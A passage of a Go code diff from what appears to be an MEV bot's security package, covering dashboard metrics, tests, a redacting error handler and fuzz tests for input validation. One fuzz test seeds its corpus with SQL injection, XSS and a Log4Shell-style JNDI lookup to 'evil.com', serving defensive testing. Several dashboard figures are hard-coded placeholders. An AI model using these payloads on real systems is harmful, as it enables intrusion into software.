func (sd *SecurityDashboard) generatePredictions(metrics *SecurityMetrics) map[string]float64 {
return map[string]float64{
"next_hour_requests": float64(metrics.TotalRequests) * 1.05,
"next_day_threats": float64(metrics.DDoSAttempts+metrics.BruteForceAttempts) * 0.9,
"capacity_utilization": 75.0,
}
}
func (sd *SecurityDashboard) calculateGrowthRates(metrics *SecurityMetrics) map[string]float64 {
return map[string]float64{
"requests_growth": 5.2, // 5.2% growth
"threats_growth": -12.1, // -12.1% (declining)
"performance_improvement": 8.5, // 8.5% improvement
}
}
func (sd *SecurityDashboard) getSeverityLevel(count int64) string {
if count == 0 {
return "NONE"
} else if count < 10 {
return "LOW"
} else if count < 50 {
return "MEDIUM"
} else if count < 100 {
return "HIGH"
}
return "CRITICAL"
}
func (sd *SecurityDashboard) calculateTrendChange(threatType string) float64 {
// Placeholder - would calculate actual trend change
return -5.2 // -5.2% change
}
func (sd *SecurityDashboard) calculateOverallHealthScore(metrics *SecurityMetrics) float64 {
score := 100.0
// Reduce score based on various health factors
if metrics.BlockedRequests > metrics.TotalRequests/10 {
score -= 20 // High block rate
}
if metrics.FailedKeyAccess > 5 {
score -= 15 // Key access issues
}
return score
}
func (sd *SecurityDashboard) getHealthStatus(score float64) string {
if score >= 90 {
return "HEALTHY"
} else if score >= 70 {
return "WARNING"
} else if score >= 50 {
return "DEGRADED"
}
return "CRITICAL"
}
func (sd *SecurityDashboard) exportToCSV(dashboard *DashboardData) ([]byte, error) {
var csvData strings.Builder
// CSV headers
csvData.WriteString("Metric,Value,Timestamp\n")
// Overview metrics
if dashboard.OverviewMetrics != nil {
csvData.WriteString(fmt.Sprintf("TotalRequests24h,%d,%s\n",
dashboard.OverviewMetrics.TotalRequests24h, dashboard.Timestamp.Format(time.RFC3339)))
csvData.WriteString(fmt.Sprintf("BlockedRequests24h,%d,%s\n",
dashboard.OverviewMetrics.BlockedRequests24h, dashboard.Timestamp.Format(time.RFC3339)))
csvData.WriteString(fmt.Sprintf("SecurityScore,%.2f,%s\n",
dashboard.OverviewMetrics.SecurityScore, dashboard.Timestamp.Format(time.RFC3339)))
}
return []byte(csvData.String()), nil
}
func (sd *SecurityDashboard) exportToPrometheus(dashboard *DashboardData) ([]byte, error) {
var promData strings.Builder
// Prometheus format
if dashboard.OverviewMetrics != nil {
promData.WriteString(fmt.Sprintf("# HELP security_requests_total Total number of requests in last 24h\n"))
promData.WriteString(fmt.Sprintf("# TYPE security_requests_total counter\n"))
promData.WriteString(fmt.Sprintf("security_requests_total %d\n", dashboard.OverviewMetrics.TotalRequests24h))
promData.WriteString(fmt.Sprintf("# HELP security_score Current security score (0-100)\n"))
promData.WriteString(fmt.Sprintf("# TYPE security_score gauge\n"))
promData.WriteString(fmt.Sprintf("security_score %.2f\n", dashboard.OverviewMetrics.SecurityScore))
}
return []byte(promData.String()), nil
}

View File

@@ -0,0 +1,390 @@
package security
import (
"encoding/json"
"testing"
"time"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
func TestNewSecurityDashboard(t *testing.T) {
monitor := NewSecurityMonitor(&MonitorConfig{
EnableAlerts: true,
AlertBuffer: 1000,
MaxEvents: 1000,
CleanupInterval: time.Hour,
MetricsInterval: 30 * time.Second,
})
// Test with default config
dashboard := NewSecurityDashboard(monitor, nil)
assert.NotNil(t, dashboard)
assert.NotNil(t, dashboard.config)
assert.Equal(t, 30*time.Second, dashboard.config.RefreshInterval)
// Test with custom config
customConfig := &DashboardConfig{
RefreshInterval: time.Minute,
AlertThresholds: map[string]float64{
"test_metric": 0.5,
},
EnabledWidgets: []string{"overview"},
ExportFormat: "json",
}
dashboard2 := NewSecurityDashboard(monitor, customConfig)
assert.NotNil(t, dashboard2)
assert.Equal(t, time.Minute, dashboard2.config.RefreshInterval)
assert.Equal(t, 0.5, dashboard2.config.AlertThresholds["test_metric"])
}
func TestGenerateDashboard(t *testing.T) {
monitor := NewSecurityMonitor(&MonitorConfig{
EnableAlerts: true,
AlertBuffer: 1000,
MaxEvents: 1000,
CleanupInterval: time.Hour,
MetricsInterval: 30 * time.Second,
})
dashboard := NewSecurityDashboard(monitor, nil)
// Generate some test data
monitor.RecordEvent("request", "127.0.0.1", "Test request", "info", map[string]interface{}{
"success": true,
})
data, err := dashboard.GenerateDashboard()
require.NoError(t, err)
assert.NotNil(t, data)
assert.NotNil(t, data.OverviewMetrics)
assert.NotNil(t, data.ThreatAnalysis)
assert.NotNil(t, data.PerformanceData)
assert.NotNil(t, data.TrendAnalysis)
assert.NotNil(t, data.SystemHealth)
}
func TestOverviewMetrics(t *testing.T) {
monitor := NewSecurityMonitor(&MonitorConfig{
EnableAlerts: true,
})
dashboard := NewSecurityDashboard(monitor, nil)
metrics := monitor.GetMetrics()
overview := dashboard.generateOverviewMetrics(metrics)
assert.NotNil(t, overview)
assert.GreaterOrEqual(t, overview.SecurityScore, 0.0)
assert.LessOrEqual(t, overview.SecurityScore, 100.0)
assert.Contains(t, []string{"LOW", "MEDIUM", "HIGH", "CRITICAL"}, overview.ThreatLevel)
assert.GreaterOrEqual(t, overview.SuccessRate, 0.0)
assert.LessOrEqual(t, overview.SuccessRate, 100.0)
}
func TestThreatAnalysis(t *testing.T) {
monitor := NewSecurityMonitor(&MonitorConfig{
EnableAlerts: true,
})
dashboard := NewSecurityDashboard(monitor, nil)
metrics := monitor.GetMetrics()
threatAnalysis := dashboard.generateThreatAnalysis(metrics)
assert.NotNil(t, threatAnalysis)
assert.GreaterOrEqual(t, threatAnalysis.DDoSRisk, 0.0)
assert.LessOrEqual(t, threatAnalysis.DDoSRisk, 1.0)
assert.GreaterOrEqual(t, threatAnalysis.BruteForceRisk, 0.0)
assert.LessOrEqual(t, threatAnalysis.BruteForceRisk, 1.0)
assert.GreaterOrEqual(t, threatAnalysis.AnomalyScore, 0.0)
assert.LessOrEqual(t, threatAnalysis.AnomalyScore, 1.0)
assert.NotNil(t, threatAnalysis.MitigationStatus)
assert.NotNil(t, threatAnalysis.ThreatVectors)
}
func TestPerformanceMetrics(t *testing.T) {
monitor := NewSecurityMonitor(&MonitorConfig{
EnableAlerts: true,
})
dashboard := NewSecurityDashboard(monitor, nil)
metrics := monitor.GetMetrics()
performance := dashboard.generatePerformanceMetrics(metrics)
assert.NotNil(t, performance)
assert.Greater(t, performance.AverageValidationTime, 0.0)
assert.Greater(t, performance.AverageEncryptionTime, 0.0)
assert.Greater(t, performance.AverageDecryptionTime, 0.0)
assert.GreaterOrEqual(t, performance.ErrorRate, 0.0)
assert.LessOrEqual(t, performance.ErrorRate, 100.0)
}
func TestDashboardSystemHealth(t *testing.T) {
monitor := NewSecurityMonitor(&MonitorConfig{
EnableAlerts: true,
})
dashboard := NewSecurityDashboard(monitor, nil)
metrics := monitor.GetMetrics()
health := dashboard.generateSystemHealth(metrics)
assert.NotNil(t, health)
assert.NotNil(t, health.SecurityComponentHealth)
assert.Contains(t, []string{"HEALTHY", "WARNING", "DEGRADED", "CRITICAL"}, health.OverallHealth)
assert.GreaterOrEqual(t, health.HealthScore, 0.0)
assert.LessOrEqual(t, health.HealthScore, 100.0)
}
func TestTopThreats(t *testing.T) {
monitor := NewSecurityMonitor(&MonitorConfig{
EnableAlerts: true,
})
dashboard := NewSecurityDashboard(monitor, nil)
metrics := monitor.GetMetrics()
topThreats := dashboard.generateTopThreats(metrics)
assert.NotNil(t, topThreats)
assert.LessOrEqual(t, len(topThreats), 10) // Should be reasonable number
for _, threat := range topThreats {
assert.NotEmpty(t, threat.ThreatType)
assert.GreaterOrEqual(t, threat.Count, int64(0))
assert.Contains(t, []string{"NONE", "LOW", "MEDIUM", "HIGH", "CRITICAL"}, threat.Severity)
assert.Contains(t, []string{"ACTIVE", "MITIGATED", "MONITORING"}, threat.Status)
}
}
func TestTrendAnalysis(t *testing.T) {
monitor := NewSecurityMonitor(&MonitorConfig{
EnableAlerts: true,
})
dashboard := NewSecurityDashboard(monitor, nil)
metrics := monitor.GetMetrics()
trends := dashboard.generateTrendAnalysis(metrics)
assert.NotNil(t, trends)
assert.NotNil(t, trends.HourlyTrends)
assert.NotNil(t, trends.DailyTrends)
assert.NotNil(t, trends.Predictions)
assert.NotNil(t, trends.GrowthRates)
// Check hourly trends have expected structure
if requestTrends, exists := trends.HourlyTrends["requests"]; exists {
assert.LessOrEqual(t, len(requestTrends), 24) // Should have at most 24 hours
for _, point := range requestTrends {
assert.GreaterOrEqual(t, point.Value, 0.0)
assert.False(t, point.Timestamp.IsZero())
}
}
}
func TestExportDashboard(t *testing.T) {
monitor := NewSecurityMonitor(&MonitorConfig{
EnableAlerts: true,
})
dashboard := NewSecurityDashboard(monitor, nil)
// Test JSON export
jsonData, err := dashboard.ExportDashboard("json")
require.NoError(t, err)
assert.NotEmpty(t, jsonData)
// Verify it's valid JSON
var parsed DashboardData
err = json.Unmarshal(jsonData, &parsed)
require.NoError(t, err)
// Test CSV export
csvData, err := dashboard.ExportDashboard("csv")
require.NoError(t, err)
assert.NotEmpty(t, csvData)
assert.Contains(t, string(csvData), "Metric,Value,Timestamp")
// Test Prometheus export
promData, err := dashboard.ExportDashboard("prometheus")
require.NoError(t, err)
assert.NotEmpty(t, promData)
assert.Contains(t, string(promData), "# HELP")
assert.Contains(t, string(promData), "# TYPE")
// Test unsupported format
_, err = dashboard.ExportDashboard("unsupported")
assert.Error(t, err)
assert.Contains(t, err.Error(), "unsupported export format")
}
func TestSecurityScoreCalculation(t *testing.T) {
monitor := NewSecurityMonitor(&MonitorConfig{
EnableAlerts: true,
})
dashboard := NewSecurityDashboard(monitor, nil)
// Test with clean metrics (high score)
cleanMetrics := &SecurityMetrics{
TotalRequests: 1000,
BlockedRequests: 0,
DDoSAttempts: 0,
BruteForceAttempts: 0,
RateLimitViolations: 0,
}
score := dashboard.calculateSecurityScore(cleanMetrics)
assert.Equal(t, 100.0, score)
// Test with some threats (reduced score)
threatsMetrics := &SecurityMetrics{
TotalRequests: 1000,
BlockedRequests: 50,
DDoSAttempts: 10,
BruteForceAttempts: 5,
RateLimitViolations: 20,
}
score = dashboard.calculateSecurityScore(threatsMetrics)
assert.Less(t, score, 100.0)
assert.GreaterOrEqual(t, score, 0.0)
}
func TestThreatLevelCalculation(t *testing.T) {
monitor := NewSecurityMonitor(&MonitorConfig{
EnableAlerts: true,
})
dashboard := NewSecurityDashboard(monitor, nil)
testCases := []struct {
score float64
expected string
}{
{95.0, "LOW"},
{85.0, "MEDIUM"},
{60.0, "HIGH"},
{30.0, "CRITICAL"},
}
for _, tc := range testCases {
result := dashboard.calculateThreatLevel(tc.score)
assert.Equal(t, tc.expected, result, "Score %.1f should give threat level %s", tc.score, tc.expected)
}
}
func TestWidgetConfiguration(t *testing.T) {
monitor := NewSecurityMonitor(&MonitorConfig{
EnableAlerts: true,
})
// Test with limited widgets
config := &DashboardConfig{
EnabledWidgets: []string{"overview", "alerts"},
}
dashboard := NewSecurityDashboard(monitor, config)
assert.True(t, dashboard.isWidgetEnabled("overview"))
assert.True(t, dashboard.isWidgetEnabled("alerts"))
assert.False(t, dashboard.isWidgetEnabled("threats"))
assert.False(t, dashboard.isWidgetEnabled("performance"))
// Generate dashboard with limited widgets
data, err := dashboard.GenerateDashboard()
require.NoError(t, err)
assert.NotNil(t, data.OverviewMetrics)
assert.NotNil(t, data.SecurityAlerts)
assert.Nil(t, data.ThreatAnalysis) // Should be nil because "threats" widget is disabled
assert.Nil(t, data.PerformanceData) // Should be nil because "performance" widget is disabled
}
func TestAttackPatternDetection(t *testing.T) {
monitor := NewSecurityMonitor(&MonitorConfig{
EnableAlerts: true,
})
dashboard := NewSecurityDashboard(monitor, nil)
// Test with metrics showing DDoS activity
metrics := &SecurityMetrics{
DDoSAttempts: 25,
BruteForceAttempts: 0,
}
patterns := dashboard.detectAttackPatterns(metrics)
assert.NotEmpty(t, patterns)
ddosPattern := patterns[0]
assert.Equal(t, "DDoS", ddosPattern.PatternType)
assert.Equal(t, int64(25), ddosPattern.Frequency)
assert.Equal(t, "HIGH", ddosPattern.Severity)
assert.GreaterOrEqual(t, ddosPattern.Confidence, 0.0)
assert.LessOrEqual(t, ddosPattern.Confidence, 1.0)
assert.NotEmpty(t, ddosPattern.Description)
}
func TestRiskFactorIdentification(t *testing.T) {
monitor := NewSecurityMonitor(&MonitorConfig{
EnableAlerts: true,
})
dashboard := NewSecurityDashboard(monitor, nil)
// Test with various risk scenarios
riskMetrics := &SecurityMetrics{
DDoSAttempts: 15,
BruteForceAttempts: 8,
RateLimitViolations: 150,
FailedKeyAccess: 12,
}
factors := dashboard.identifyRiskFactors(riskMetrics)
assert.NotEmpty(t, factors)
assert.Contains(t, factors, "High DDoS activity")
assert.Contains(t, factors, "Brute force attacks detected")
assert.Contains(t, factors, "Excessive rate limit violations")
assert.Contains(t, factors, "Multiple failed key access attempts")
// Test with clean metrics
cleanMetrics := &SecurityMetrics{
DDoSAttempts: 0,
BruteForceAttempts: 0,
RateLimitViolations: 5,
FailedKeyAccess: 2,
}
cleanFactors := dashboard.identifyRiskFactors(cleanMetrics)
assert.Empty(t, cleanFactors)
}
func BenchmarkGenerateDashboard(b *testing.B) {
monitor := NewSecurityMonitor(&MonitorConfig{
EnableAlerts: true,
})
dashboard := NewSecurityDashboard(monitor, nil)
b.ResetTimer()
for i := 0; i < b.N; i++ {
_, err := dashboard.GenerateDashboard()
if err != nil {
b.Fatal(err)
}
}
}
func BenchmarkExportJSON(b *testing.B) {
monitor := NewSecurityMonitor(&MonitorConfig{
EnableAlerts: true,
})
dashboard := NewSecurityDashboard(monitor, nil)
b.ResetTimer()
for i := 0; i < b.N; i++ {
_, err := dashboard.ExportDashboard("json")
if err != nil {
b.Fatal(err)
}
}
}

View File

@@ -0,0 +1,348 @@
package security
import (
"context"
"fmt"
"regexp"
"runtime"
"strings"
"time"
"github.com/fraktal/mev-beta/internal/logger"
)
// SecureError represents a security-aware error with context
type SecureError struct {
Code string `json:"code"`
Message string `json:"message"`
Timestamp time.Time `json:"timestamp"`
Context map[string]interface{} `json:"context,omitempty"`
Stack []StackFrame `json:"stack,omitempty"`
Wrapped error `json:"-"`
Sensitive bool `json:"sensitive"`
Category ErrorCategory `json:"category"`
Severity ErrorSeverity `json:"severity"`
}
// StackFrame represents a single frame in the call stack
type StackFrame struct {
Function string `json:"function"`
File string `json:"file"`
Line int `json:"line"`
}
// ErrorCategory defines categories of errors
type ErrorCategory string
const (
ErrorCategoryAuthentication ErrorCategory = "authentication"
ErrorCategoryAuthorization ErrorCategory = "authorization"
ErrorCategoryValidation ErrorCategory = "validation"
ErrorCategoryRateLimit ErrorCategory = "rate_limit"
ErrorCategoryCircuitBreaker ErrorCategory = "circuit_breaker"
ErrorCategoryEncryption ErrorCategory = "encryption"
ErrorCategoryNetwork ErrorCategory = "network"
ErrorCategoryTransaction ErrorCategory = "transaction"
ErrorCategoryInternal ErrorCategory = "internal"
)
// ErrorSeverity defines error severity levels
type ErrorSeverity string
const (
ErrorSeverityLow ErrorSeverity = "low"
ErrorSeverityMedium ErrorSeverity = "medium"
ErrorSeverityHigh ErrorSeverity = "high"
ErrorSeverityCritical ErrorSeverity = "critical"
)
// ErrorHandler provides secure error handling with context preservation
type ErrorHandler struct {
enableStackTrace bool
sensitiveFields map[string]bool
errorMetrics *ErrorMetrics
logger *logger.Logger
}
// ErrorMetrics tracks error statistics
type ErrorMetrics struct {
TotalErrors int64 `json:"total_errors"`
ErrorsByCategory map[ErrorCategory]int64 `json:"errors_by_category"`
ErrorsBySeverity map[ErrorSeverity]int64 `json:"errors_by_severity"`
SensitiveDataLeaks int64 `json:"sensitive_data_leaks"`
}
// NewErrorHandler creates a new secure error handler
func NewErrorHandler(enableStackTrace bool) *ErrorHandler {
return &ErrorHandler{
enableStackTrace: enableStackTrace,
sensitiveFields: map[string]bool{
"password": true,
"private_key": true,
"secret": true,
"token": true,
"seed": true,
"mnemonic": true,
"api_key": true,
"private": true,
},
errorMetrics: &ErrorMetrics{
ErrorsByCategory: make(map[ErrorCategory]int64),
ErrorsBySeverity: make(map[ErrorSeverity]int64),
},
logger: logger.New("info", "json", "logs/errors.log"),
}
}
// WrapError wraps an error with security context
func (eh *ErrorHandler) WrapError(err error, code string, message string, category ErrorCategory, severity ErrorSeverity) *SecureError {
if err == nil {
return nil
}
secureErr := &SecureError{
Code: code,
Message: message,
Timestamp: time.Now(),
Wrapped: err,
Category: category,
Severity: severity,
Context: make(map[string]interface{}),
}
// Capture stack trace if enabled
if eh.enableStackTrace {
secureErr.Stack = eh.captureStackTrace()
}
// Check for sensitive data
secureErr.Sensitive = eh.containsSensitiveData(err.Error()) || eh.containsSensitiveData(message)
// Update metrics
eh.updateMetrics(secureErr)
// Log error appropriately
eh.logError(secureErr)
return secureErr
}
// WrapErrorWithContext wraps an error with additional context
func (eh *ErrorHandler) WrapErrorWithContext(ctx context.Context, err error, code string, message string, category ErrorCategory, severity ErrorSeverity, context map[string]interface{}) *SecureError {
secureErr := eh.WrapError(err, code, message, category, severity)
if secureErr == nil {
return nil
}
// Add context while sanitizing sensitive data
for key, value := range context {
if !eh.isSensitiveField(key) {
secureErr.Context[key] = value
} else {
secureErr.Context[key] = "[REDACTED]"
secureErr.Sensitive = true
}
}
// Add request context if available
if ctx != nil {
if requestID := ctx.Value("request_id"); requestID != nil {
secureErr.Context["request_id"] = requestID
}
if userID := ctx.Value("user_id"); userID != nil {
secureErr.Context["user_id"] = userID
}
if sessionID := ctx.Value("session_id"); sessionID != nil {
secureErr.Context["session_id"] = sessionID
}
}
return secureErr
}
// Error implements the error interface
func (se *SecureError) Error() string {
if se.Sensitive {
return fmt.Sprintf("[%s] %s (sensitive data redacted)", se.Code, se.Message)
}
return fmt.Sprintf("[%s] %s", se.Code, se.Message)
}
// Unwrap returns the wrapped error
func (se *SecureError) Unwrap() error {
return se.Wrapped
}
// SafeString returns a safe string representation without sensitive data
func (se *SecureError) SafeString() string {
if se.Sensitive {
return fmt.Sprintf("Error: %s (details redacted for security)", se.Message)
}
return se.Error()
}
// DetailedString returns detailed error information for internal logging
func (se *SecureError) DetailedString() string {
var parts []string
parts = append(parts, fmt.Sprintf("Code: %s", se.Code))
parts = append(parts, fmt.Sprintf("Message: %s", se.Message))
parts = append(parts, fmt.Sprintf("Category: %s", se.Category))
parts = append(parts, fmt.Sprintf("Severity: %s", se.Severity))
parts = append(parts, fmt.Sprintf("Timestamp: %s", se.Timestamp.Format(time.RFC3339)))
if len(se.Context) > 0 {
parts = append(parts, fmt.Sprintf("Context: %+v", se.Context))
}
if se.Wrapped != nil {
parts = append(parts, fmt.Sprintf("Wrapped: %s", se.Wrapped.Error()))
}
return strings.Join(parts, ", ")
}
// captureStackTrace captures the current call stack
func (eh *ErrorHandler) captureStackTrace() []StackFrame {
var frames []StackFrame
// Skip the first few frames (this function and WrapError)
for i := 3; i < 10; i++ {
pc, file, line, ok := runtime.Caller(i)
if !ok {
break
}
fn := runtime.FuncForPC(pc)
if fn == nil {
continue
}
frames = append(frames, StackFrame{
Function: fn.Name(),
File: file,
Line: line,
})
}
return frames
}
// containsSensitiveData checks if the text contains sensitive information
func (eh *ErrorHandler) containsSensitiveData(text string) bool {
lowercaseText := strings.ToLower(text)
for field := range eh.sensitiveFields {
if strings.Contains(lowercaseText, field) {
return true
}
}
// Check for common patterns that might contain sensitive data
sensitivePatterns := []string{
"0x[a-fA-F0-9]{40}", // Ethereum addresses
"0x[a-fA-F0-9]{64}", // Private keys/hashes
"\\b[A-Za-z0-9+/]{20,}={0,2}\\b", // Base64 encoded data
}
for _, pattern := range sensitivePatterns {
if matched, _ := regexp.MatchString(pattern, text); matched {
return true
}
}
return false
}
// isSensitiveField checks if a field name indicates sensitive data
func (eh *ErrorHandler) isSensitiveField(fieldName string) bool {
return eh.sensitiveFields[strings.ToLower(fieldName)]
}
// updateMetrics updates error metrics
func (eh *ErrorHandler) updateMetrics(err *SecureError) {
eh.errorMetrics.TotalErrors++
eh.errorMetrics.ErrorsByCategory[err.Category]++
eh.errorMetrics.ErrorsBySeverity[err.Severity]++
if err.Sensitive {
eh.errorMetrics.SensitiveDataLeaks++
}
}
// logError logs the error appropriately based on sensitivity and severity
func (eh *ErrorHandler) logError(err *SecureError) {
logContext := map[string]interface{}{
"error_code": err.Code,
"error_category": string(err.Category),
"error_severity": string(err.Severity),
"timestamp": err.Timestamp,
}
// Add safe context
for key, value := range err.Context {
if !eh.isSensitiveField(key) {
logContext[key] = value
}
}
logMessage := err.Message
if err.Sensitive {
logMessage = "Sensitive error occurred (details redacted)"
logContext["sensitive"] = true
}
switch err.Severity {
case ErrorSeverityCritical:
eh.logger.Error(logMessage)
case ErrorSeverityHigh:
eh.logger.Error(logMessage)
case ErrorSeverityMedium:
eh.logger.Warn(logMessage)
case ErrorSeverityLow:
eh.logger.Info(logMessage)
default:
eh.logger.Info(logMessage)
}
}
// GetMetrics returns current error metrics
func (eh *ErrorHandler) GetMetrics() *ErrorMetrics {
return eh.errorMetrics
}
// Common error creation helpers
// NewAuthenticationError creates a new authentication error
func (eh *ErrorHandler) NewAuthenticationError(message string, err error) *SecureError {
return eh.WrapError(err, "AUTH_FAILED", message, ErrorCategoryAuthentication, ErrorSeverityHigh)
}
// NewAuthorizationError creates a new authorization error
func (eh *ErrorHandler) NewAuthorizationError(message string, err error) *SecureError {
return eh.WrapError(err, "AUTHZ_FAILED", message, ErrorCategoryAuthorization, ErrorSeverityHigh)
}
// NewValidationError creates a new validation error
func (eh *ErrorHandler) NewValidationError(message string, err error) *SecureError {
return eh.WrapError(err, "VALIDATION_FAILED", message, ErrorCategoryValidation, ErrorSeverityMedium)
}
// NewRateLimitError creates a new rate limit error
func (eh *ErrorHandler) NewRateLimitError(message string, err error) *SecureError {
return eh.WrapError(err, "RATE_LIMIT_EXCEEDED", message, ErrorCategoryRateLimit, ErrorSeverityMedium)
}
// NewEncryptionError creates a new encryption error
func (eh *ErrorHandler) NewEncryptionError(message string, err error) *SecureError {
return eh.WrapError(err, "ENCRYPTION_FAILED", message, ErrorCategoryEncryption, ErrorSeverityCritical)
}
// NewTransactionError creates a new transaction error
func (eh *ErrorHandler) NewTransactionError(message string, err error) *SecureError {
return eh.WrapError(err, "TRANSACTION_FAILED", message, ErrorCategoryTransaction, ErrorSeverityHigh)
}
// NewInternalError creates a new internal error
func (eh *ErrorHandler) NewInternalError(message string, err error) *SecureError {
return eh.WrapError(err, "INTERNAL_ERROR", message, ErrorCategoryInternal, ErrorSeverityCritical)
}

View File

@@ -0,0 +1,267 @@
package security
import (
"math/big"
"strings"
"testing"
"time"
"github.com/ethereum/go-ethereum/common"
"github.com/ethereum/go-ethereum/core/types"
)
// FuzzValidateAddress tests address validation with random inputs
func FuzzValidateAddress(f *testing.F) {
validator := NewInputValidator(42161) // Arbitrum chain ID
// Seed corpus with known patterns
f.Add("0x0000000000000000000000000000000000000000") // Zero address
f.Add("0xa0b86991c431c431c8f4c431c431c431c431c431c") // Valid address
f.Add("0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef") // Suspicious pattern
f.Add("0x") // Short invalid
f.Add("") // Empty
f.Add("not_an_address") // Invalid format
f.Fuzz(func(t *testing.T, addrStr string) {
defer func() {
if r := recover(); r != nil {
t.Errorf("ValidateAddress panicked with input %q: %v", addrStr, r)
}
}()
// Test that validation doesn't crash on any input
if common.IsHexAddress(addrStr) {
addr := common.HexToAddress(addrStr)
result := validator.ValidateAddress(addr)
// Ensure result is never nil
if result == nil {
t.Error("ValidateAddress returned nil result")
}
// Validate result structure
if len(result.Errors) == 0 && !result.Valid {
t.Error("Result marked invalid but no errors provided")
}
}
})
}
// FuzzValidateString tests string validation with various injection attempts
func FuzzValidateString(f *testing.F) {
validator := NewInputValidator(42161)
// Seed with common injection patterns
f.Add("'; DROP TABLE users; --")
f.Add("<script>alert('xss')</script>")
f.Add("${jndi:ldap://evil.com/}")
f.Add("\x00\x01\x02\x03\x04")
f.Add(strings.Repeat("A", 10000))
f.Add("normal_string")
f.Fuzz(func(t *testing.T, input string) {
defer func() {
if r := recover(); r != nil {
t.Errorf("ValidateString panicked with input length %d: %v", len(input), r)
}
}()
result := validator.ValidateString(input, "test_field", 1000)
// Ensure validation completes
if result == nil {
t.Error("ValidateString returned nil result")
}
// Test sanitization
sanitized := validator.SanitizeInput(input)
// Ensure sanitized string doesn't contain null bytes
if strings.Contains(sanitized, "\x00") {
t.Error("Sanitized string still contains null bytes")
}
// Ensure sanitization doesn't crash
if len(sanitized) > len(input)*2 {
t.Error("Sanitized string unexpectedly longer than 2x original")
}
})
}
// FuzzValidateNumericString tests numeric string validation
func FuzzValidateNumericString(f *testing.F) {
validator := NewInputValidator(42161)
// Seed with various numeric patterns
f.Add("123.456")
f.Add("-123")
f.Add("0.000000000000000001")
f.Add("999999999999999999999")
f.Add("00123")
f.Add("123.456.789")
f.Add("1e10")
f.Add("abc123")
f.Fuzz(func(t *testing.T, input string) {
defer func() {
if r := recover(); r != nil {
t.Errorf("ValidateNumericString panicked with input %q: %v", input, r)
}
}()
result := validator.ValidateNumericString(input, "test_number")
if result == nil {
t.Error("ValidateNumericString returned nil result")
}
// If marked valid, should actually be parseable as number
if result.Valid {
if _, ok := new(big.Float).SetString(input); !ok {
// Allow some flexibility for our regex vs big.Float parsing
if !strings.Contains(input, ".") {
if _, ok := new(big.Int).SetString(input, 10); !ok {
t.Errorf("String marked as valid numeric but not parseable: %q", input)
}
}
}
}
})
}
// FuzzTransactionValidation tests transaction validation with random transaction data
func FuzzTransactionValidation(f *testing.F) {
validator := NewInputValidator(42161)
f.Fuzz(func(t *testing.T, nonce, gasLimit uint64, gasPrice, value int64, dataLen uint8) {
defer func() {
if r := recover(); r != nil {
t.Errorf("Transaction validation panicked: %v", r)
}
}()
// Constrain inputs to reasonable ranges
if gasLimit > 50000000 {
gasLimit = gasLimit % 50000000
}
if dataLen > 100 {
dataLen = dataLen % 100
}
// Create test transaction
data := make([]byte, dataLen)
for i := range data {
data[i] = byte(i % 256)
}
var gasPriceBig, valueBig *big.Int
if gasPrice >= 0 {
gasPriceBig = big.NewInt(gasPrice)
} else {
gasPriceBig = big.NewInt(-gasPrice)
}
if value >= 0 {
valueBig = big.NewInt(value)
} else {
valueBig = big.NewInt(-value)
}
to := common.HexToAddress("0x1234567890123456789012345678901234567890")
tx := types.NewTransaction(nonce, to, valueBig, gasLimit, gasPriceBig, data)
result := validator.ValidateTransaction(tx)
if result == nil {
t.Error("ValidateTransaction returned nil result")
}
})
}
// FuzzSwapParamsValidation tests swap parameter validation
func FuzzSwapParamsValidation(f *testing.F) {
validator := NewInputValidator(42161)
f.Fuzz(func(t *testing.T, amountIn, amountOut int64, slippage uint16, hoursFromNow int8) {
defer func() {
if r := recover(); r != nil {
t.Errorf("SwapParams validation panicked: %v", r)
}
}()
// Create test swap parameters
params := &SwapParams{
TokenIn: common.HexToAddress("0x1111111111111111111111111111111111111111"),
TokenOut: common.HexToAddress("0x2222222222222222222222222222222222222222"),
AmountIn: big.NewInt(amountIn),
AmountOut: big.NewInt(amountOut),
Slippage: uint64(slippage),
Deadline: time.Now().Add(time.Duration(hoursFromNow) * time.Hour),
Recipient: common.HexToAddress("0x3333333333333333333333333333333333333333"),
Pool: common.HexToAddress("0x4444444444444444444444444444444444444444"),
}
result := validator.ValidateSwapParams(params)
if result == nil {
t.Error("ValidateSwapParams returned nil result")
}
})
}
// FuzzBatchSizeValidation tests batch size validation with various inputs
func FuzzBatchSizeValidation(f *testing.F) {
validator := NewInputValidator(42161)
// Seed with known operation types
operations := []string{"transaction", "swap", "arbitrage", "query", "unknown"}
f.Fuzz(func(t *testing.T, size int, opIndex uint8) {
defer func() {
if r := recover(); r != nil {
t.Errorf("BatchSize validation panicked: %v", r)
}
}()
operation := operations[int(opIndex)%len(operations)]
result := validator.ValidateBatchSize(size, operation)
if result == nil {
t.Error("ValidateBatchSize returned nil result")
}
// Negative sizes should always be invalid
if size <= 0 && result.Valid {
t.Errorf("Negative/zero batch size %d marked as valid for operation %s", size, operation)
}
})
}
// Removed FuzzABIValidation to avoid circular import - moved to pkg/arbitrum/abi_decoder_fuzz_test.go
// BenchmarkInputValidation benchmarks validation performance under stress
func BenchmarkInputValidation(b *testing.B) {
validator := NewInputValidator(42161)
// Test with various input sizes
testInputs := []string{
"short",
strings.Repeat("medium_length_string_", 10),
strings.Repeat("long_string_with_repeating_pattern_", 100),
}
for _, input := range testInputs {
b.Run("ValidateString_len_"+string(rune(len(input))), func(b *testing.B) {
for i := 0; i < b.N; i++ {
validator.ValidateString(input, "test", 10000)
}
})
b.Run("SanitizeInput_len_"+string(rune(len(input))), func(b *testing.B) {
for i := 0; i < b.N; i++ {
validator.SanitizeInput(input)
}
})
}
}

View File

@@ -0,0 +1,624 @@
package security
import (
"fmt"
"math/big"
"regexp"
"strings"
"time"
"github.com/ethereum/go-ethereum/common"
"github.com/ethereum/go-ethereum/core/types"
)
// InputValidator provides comprehensive input validation for all MEV bot operations
type InputValidator struct {
safeMath *SafeMath
maxGasLimit uint64
maxGasPrice *big.Int
chainID uint64
}
// ValidationResult contains the result of input validation
type ValidationResult struct {
Valid bool `json:"valid"`
Errors []string `json:"errors,omitempty"`
Warnings []string `json:"warnings,omitempty"`
}
// TransactionParams represents transaction parameters for validation
type TransactionParams struct {
To *common.Address `json:"to"`
Value *big.Int `json:"value"`
Data []byte `json:"data"`
Gas uint64 `json:"gas"`
GasPrice *big.Int `json:"gas_price"`
Nonce uint64 `json:"nonce"`
}
// SwapParams represents swap parameters for validation
type SwapParams struct {
TokenIn common.Address `json:"token_in"`
TokenOut common.Address `json:"token_out"`
AmountIn *big.Int `json:"amount_in"`
AmountOut *big.Int `json:"amount_out"`
